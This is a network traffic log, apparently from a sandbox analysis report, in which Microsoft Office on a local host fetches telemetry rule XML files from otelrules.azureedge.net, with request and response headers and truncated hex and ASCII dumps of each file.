2024-11-04 16:31:46 UTC	1397	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 33 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 79 73 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700351" V="1" DC="SM" EN="Office.Telemetry.Event.Office.System.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSys

Session ID	Source IP	Source Port	Destination IP	Destination Port
111	192.168.2.5	49828	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-04 16:31:46 UTC	192	OUT	GET /rules/rule703901v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-04 16:31:46 UTC	494	IN	HTTP/1.1 200 OK Date: Mon, 04 Nov 2024 16:31:46 GMT Content-Type: text/xml Content-Length: 1427 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:53 GMT ETag: "0x8DC582BE56F6873" x-ms-request-id: 46dd0ec2-d01e-008e-5058-2e387a000000 x-ms-version: 2018-03-28 x-azure-ref: 20241104T163146Z-r159446fcd775vgfhC1DFW1fvw00000004n000000000bg9x x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-04 16:31:46 UTC	1427	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 39 30 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 65 72 76 69 63 65 61 62 69 6c 69 74 79 4d 61 6e 61 67 65 72 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703901" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ServiceabilityManager.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="Nexu

Session ID	Source IP	Source Port	Destination IP	Destination Port
112	192.168.2.5	49827	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-04 16:31:46 UTC	192	OUT	GET /rules/rule700350v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-04 16:31:46 UTC	538	IN	HTTP/1.1 200 OK Date: Mon, 04 Nov 2024 16:31:46 GMT Content-Type: text/xml Content-Length: 1360 Connection: close Vary: Accept-Encoding Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:40 GMT ETag: "0x8DC582BDD74D2EC" x-ms-request-id: 8fcaa1bb-301e-006e-11d2-2cf018000000 x-ms-version: 2018-03-28 x-azure-ref: 20241104T163146Z-16547b76f7f7jnp2hC1DFWfc3000000003z0000000009eaf x-fd-int-roxy-purgeid: 0 X-Cache-Info: L1_T2 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-04 16:31:46 UTC	1360	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 33 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 79 73 74 65 6d 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700350" V="1" DC="SM" EN="Office.Telemetry.Event.Office.System" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSystem" S="Medium" /> <F T="2">

Session ID	Source IP	Source Port	Destination IP	Destination Port
113	192.168.2.5	49829	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-04 16:31:46 UTC	192	OUT	GET /rules/rule703900v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-04 16:31:46 UTC	515	IN	HTTP/1.1 200 OK Date: Mon, 04 Nov 2024 16:31:46 GMT Content-Type: text/xml Content-Length: 1390 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:49 GMT ETag: "0x8DC582BE3002601" x-ms-request-id: 182ca2aa-101e-00a2-3955-2e9f2e000000 x-ms-version: 2018-03-28 x-azure-ref: 20241104T163146Z-176bd8f9bc55m94hhC1DFWqfwc0000000140000000000064 x-fd-int-roxy-purgeid: 0 X-Cache-Info: L1_T2 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-04 16:31:46 UTC	1390	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 39 30 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 65 72 76 69 63 65 61 62 69 6c 69 74 79 4d 61 6e 61 67 65 72 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 65 72 76 69 63 65 61 62 69 6c 69 74 79 4d 61 6e 61 67 65 72 22 20 53 3d Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703900" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ServiceabilityManager" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenServiceabilityManager" S=

Session ID	Source IP	Source Port	Destination IP	Destination Port
114	192.168.2.5	49830	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-04 16:31:46 UTC	192	OUT	GET /rules/rule701501v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-04 16:31:47 UTC	517	IN	HTTP/1.1 200 OK Date: Mon, 04 Nov 2024 16:31:46 GMT Content-Type: text/xml Content-Length: 1401 Connection: close Vary: Accept-Encoding Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:48 GMT ETag: "0x8DC582BE2A9D541" x-ms-request-id: c6a80355-b01e-0070-0e08-2c1cc0000000 x-ms-version: 2018-03-28 x-azure-ref: 20241104T163146Z-16547b76f7fwvr5dhC1DFW2c9400000003r000000000pwq1 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-04 16:31:47 UTC	1401	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 35 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 65 63 75 72 69 74 79 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701501" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Security.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenS

Session ID	Source IP	Source Port	Destination IP	Destination Port
115	192.168.2.5	49831	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-04 16:31:46 UTC	192	OUT	GET /rules/rule701500v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-04 16:31:47 UTC	494	IN	HTTP/1.1 200 OK Date: Mon, 04 Nov 2024 16:31:46 GMT Content-Type: text/xml Content-Length: 1364 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:28:03 GMT ETag: "0x8DC582BEB6AD293" x-ms-request-id: 659fa809-c01e-007a-195c-2eb877000000 x-ms-version: 2018-03-28 x-azure-ref: 20241104T163146Z-15869dbbcc6kg5mvhC1DFWkb5w00000003v0000000008uku x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-04 16:31:47 UTC	1364	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 35 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 65 63 75 72 69 74 79 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 65 63 75 72 69 74 79 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701500" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Security" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSecurity" S="Medium" /> <F T="2">

Session ID	Source IP	Source Port	Destination IP	Destination Port
116	192.168.2.5	49832	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-04 16:31:46 UTC	192	OUT	GET /rules/rule702801v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-04 16:31:47 UTC	538	IN	HTTP/1.1 200 OK Date: Mon, 04 Nov 2024 16:31:46 GMT Content-Type: text/xml Content-Length: 1391 Connection: close Vary: Accept-Encoding Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:43 GMT ETag: "0x8DC582BDF58DC7E" x-ms-request-id: 6c65b011-001e-000b-6024-2c15a7000000 x-ms-version: 2018-03-28 x-azure-ref: 20241104T163146Z-16547b76f7ftdm8dhC1DFWs13g00000003sg00000000sawc x-fd-int-roxy-purgeid: 0 X-Cache-Info: L1_T2 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-04 16:31:47 UTC	1391	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 38 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 44 58 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 44 58 22 20 53 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702801" V="1" DC="SM" EN="Office.Telemetry.Event.Office.SDX.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSDX" S

Session ID	Source IP	Source Port	Destination IP	Destination Port
117	192.168.2.5	49833	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-04 16:31:46 UTC	192	OUT	GET /rules/rule702800v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-04 16:31:47 UTC	538	IN	HTTP/1.1 200 OK Date: Mon, 04 Nov 2024 16:31:47 GMT Content-Type: text/xml Content-Length: 1354 Connection: close Vary: Accept-Encoding Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:45 GMT ETag: "0x8DC582BE0662D7C" x-ms-request-id: 1deec605-401e-0029-2fd2-2c9b43000000 x-ms-version: 2018-03-28 x-azure-ref: 20241104T163147Z-16547b76f7fp6mhthC1DFWrggn0000000430000000001t66 x-fd-int-roxy-purgeid: 0 X-Cache-Info: L1_T2 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-04 16:31:47 UTC	1354	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 38 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 44 58 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 44 58 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702800" V="1" DC="SM" EN="Office.Telemetry.Event.Office.SDX" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSDX" S="Medium" /> <F T="2"> <O

Session ID	Source IP	Source Port	Destination IP	Destination Port
118	192.168.2.5	49834	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-04 16:31:47 UTC	192	OUT	GET /rules/rule703351v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-04 16:31:47 UTC	494	IN	HTTP/1.1 200 OK Date: Mon, 04 Nov 2024 16:31:47 GMT Content-Type: text/xml Content-Length: 1403 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:39 GMT ETag: "0x8DC582BDCDD6400" x-ms-request-id: 34705859-801e-0047-165c-2e7265000000 x-ms-version: 2018-03-28 x-azure-ref: 20241104T163147Z-176bd8f9bc59kq6hhC1DFWrs8000000005wg000000002ez6 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-04 16:31:47 UTC	1403	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 33 35 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 63 72 69 70 74 4c 61 62 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703351" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ScriptLab.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToken

Session ID	Source IP	Source Port	Destination IP	Destination Port
119	192.168.2.5	49835	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-04 16:31:47 UTC	192	OUT	GET /rules/rule703350v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-04 16:31:47 UTC	538	IN	HTTP/1.1 200 OK Date: Mon, 04 Nov 2024 16:31:47 GMT Content-Type: text/xml Content-Length: 1366 Connection: close Vary: Accept-Encoding Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:42 GMT ETag: "0x8DC582BDF1E2608" x-ms-request-id: 3018dd1c-101e-008d-1bd2-2c92e5000000 x-ms-version: 2018-03-28 x-azure-ref: 20241104T163147Z-16547b76f7frbg6bhC1DFWr54000000003wg000000003hbd x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT X-Cache-Info: L1_T2 Accept-Ranges: bytes
2024-11-04 16:31:47 UTC	1366	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 33 35 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 63 72 69 70 74 4c 61 62 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 63 72 69 70 74 4c 61 62 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703350" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ScriptLab" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenScriptLab" S="Medium" /> <F T="2

Session ID	Source IP	Source Port	Destination IP	Destination Port
120	192.168.2.5	49837	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-04 16:31:47 UTC	192	OUT	GET /rules/rule703500v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-04 16:31:47 UTC	538	IN	HTTP/1.1 200 OK Date: Mon, 04 Nov 2024 16:31:47 GMT Content-Type: text/xml Content-Length: 1362 Connection: close Vary: Accept-Encoding Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:43 GMT ETag: "0x8DC582BDF497570" x-ms-request-id: 9890a075-d01e-002b-06d2-2c25fb000000 x-ms-version: 2018-03-28 x-azure-ref: 20241104T163147Z-16547b76f7fknvdnhC1DFWxnys00000003yg00000000b8wd x-fd-int-roxy-purgeid: 0 X-Cache-Info: L1_T2 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-04 16:31:47 UTC	1362	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 35 30 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 61 6e 64 62 6f 78 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 61 6e 64 62 6f 78 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703500" V="0" DC="SM" EN="Office.Telemetry.Event.Office.Sandbox" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSandbox" S="Medium" /> <F T="2">

Session ID	Source IP	Source Port	Destination IP	Destination Port
121	192.168.2.5	49838	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-04 16:31:47 UTC	192	OUT	GET /rules/rule701801v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-04 16:31:48 UTC	515	IN	HTTP/1.1 200 OK Date: Mon, 04 Nov 2024 16:31:47 GMT Content-Type: text/xml Content-Length: 1403 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:38 GMT ETag: "0x8DC582BDC2EEE03" x-ms-request-id: ebd57e1f-d01e-005a-2f5c-2e7fd9000000 x-ms-version: 2018-03-28 x-azure-ref: 20241104T163147Z-176bd8f9bc5kp2ljhC1DFW54h0000000058g0000000085ge x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT X-Cache-Info: L1_T2 Accept-Ranges: bytes
2024-11-04 16:31:48 UTC	1403	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 38 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 52 65 73 6f 75 72 63 65 73 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701801" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Resources.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToken

Session ID	Source IP	Source Port	Destination IP	Destination Port
122	192.168.2.5	49836	13.107.246.45	443

